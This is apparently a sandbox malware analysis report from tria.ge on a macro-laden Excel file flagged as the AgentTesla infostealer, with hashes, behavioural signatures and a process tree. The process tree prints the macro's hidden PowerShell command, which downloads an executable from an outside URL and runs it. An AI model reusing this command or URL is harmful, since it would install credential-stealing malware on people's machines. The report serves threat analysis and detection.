Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
137s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
10/07/2020, 07:13
Static task
static1
Behavioral task
behavioral1
Sample
CO-MFE-6-2020.xlsm
Resource
win7
Behavioral task
behavioral2
Sample
CO-MFE-6-2020.xlsm
Resource
win10v200430
General
-
Target
CO-MFE-6-2020.xlsm
-
Size
173KB
-
MD5
84ba27c4b3083be263a54322adec3149
-
SHA1
2548d9097c1b27f064a7089afe393fde0fbfa64d
-
SHA256
fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
-
SHA512
1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
Extracted
http://shopcart.indbytes.com/cig/4501307788.jpg
Signatures
-
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1612 wrote to memory of 3864 1612 EXCEL.EXE 71 PID 1612 wrote to memory of 3864 1612 EXCEL.EXE 71 PID 3864 wrote to memory of 3472 3864 cmd.exe 73 PID 3864 wrote to memory of 3472 3864 cmd.exe 73 PID 3472 wrote to memory of 1072 3472 powershell.exe 76 PID 3472 wrote to memory of 1072 3472 powershell.exe 76 PID 3472 wrote to memory of 1072 3472 powershell.exe 76 PID 1072 wrote to memory of 3792 1072 Name.exe 78 PID 1072 wrote to memory of 3792 1072 Name.exe 78 PID 1072 wrote to memory of 3792 1072 Name.exe 78 PID 1072 wrote to memory of 3792 1072 Name.exe 78 -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3472 powershell.exe 3472 powershell.exe 3472 powershell.exe 3792 RegAsm.exe 3792 RegAsm.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1072 set thread context of 3792 1072 Name.exe 78 -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Name.exe -
Executes dropped EXE 1 IoCs
pid Process 1072 Name.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3864 1612 cmd.exe 67 -
Blacklisted process makes network request 1 IoCs
flow pid Process 17 3472 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1072 Name.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
pid Process 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 1612 EXCEL.EXE 3792 RegAsm.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1612 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3472 powershell.exe Token: SeDebugPrivilege 3792 RegAsm.exe -
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm"1⤵
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
PID:1612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')2⤵
- Suspicious use of WriteProcessMemory
- Process spawned unexpected child process
PID:3864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')3⤵
- Suspicious use of WriteProcessMemory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3472 -
C:\Users\Admin\AppData\Local\Temp\Name.exe"C:\Users\Admin\AppData\Local\Temp\Name.exe"4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of SetThreadContext
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1072 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
-
-